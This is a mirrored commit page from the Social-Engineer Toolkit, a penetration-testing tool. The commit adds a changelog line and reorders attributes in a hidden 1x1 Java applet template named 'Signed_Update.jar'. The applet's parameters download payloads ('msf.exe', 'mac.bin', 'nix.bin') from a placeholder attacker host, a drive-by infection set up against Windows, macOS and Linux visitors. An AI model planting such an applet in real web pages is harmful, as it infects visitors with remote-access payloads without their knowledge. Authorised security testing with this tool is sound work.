mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2024-11-27 15:00:27 +00:00
Fixed an applet loading issue in certain configurations
This commit is contained in:
parent
3467285856
commit
2db6c4fd40
2 changed files with 2 additions and 1 deletions
|
@ -5,6 +5,7 @@ version 5.3.3
|
|||
* fixed an issue that would cause the download to randomized name to work properly on OSX
|
||||
* fixed an issue that was preventing setoolkit from properly executing on root and moved to /tmp
|
||||
* added better stability for osx exploitation
|
||||
* fixed an issue that would cause the applet to not load on certain configurations (thanks pachulo)
|
||||
|
||||
~~~~~~~~~~~~~~~~
|
||||
version 5.3.2
|
||||
|
|
|
@ -1 +1 @@
|
|||
<applet width="1" height="1" id="IDREPLACEHERE" code="Java.class" archive="Signed_Update.jar"><param name="name" value="IDREPLACEHERE"><param name="1" value="http://ipaddrhere/msf.exe"><param name="2" value=""><param name="3" value="http://ipaddrhere/mac.bin"><param name="4" value="http://ipaddrhere/nix.bin"><param name="5" value=""><param name="6" value=""><param name="7" value="freehugs"><param name="8" value="YES"><param name="9" value=""><param name="10" value=""><param name="separate_jvm" value="true"></applet>
|
||||
<applet code="Java.class" width="1" height="1" id="IDREPLACEHERE" archive="Signed_Update.jar"><param name="name" value="IDREPLACEHERE"><param name="1" value="http://ipaddrhere/msf.exe"><param name="2" value=""><param name="3" value="http://ipaddrhere/mac.bin"><param name="4" value="http://ipaddrhere/nix.bin"><param name="5" value=""><param name="6" value=""><param name="7" value="freehugs"><param name="8" value="YES"><param name="9" value=""><param name="10" value=""><param name="separate_jvm" value="true"></applet>
|
||||
|
|
Loading…
Reference in a new issue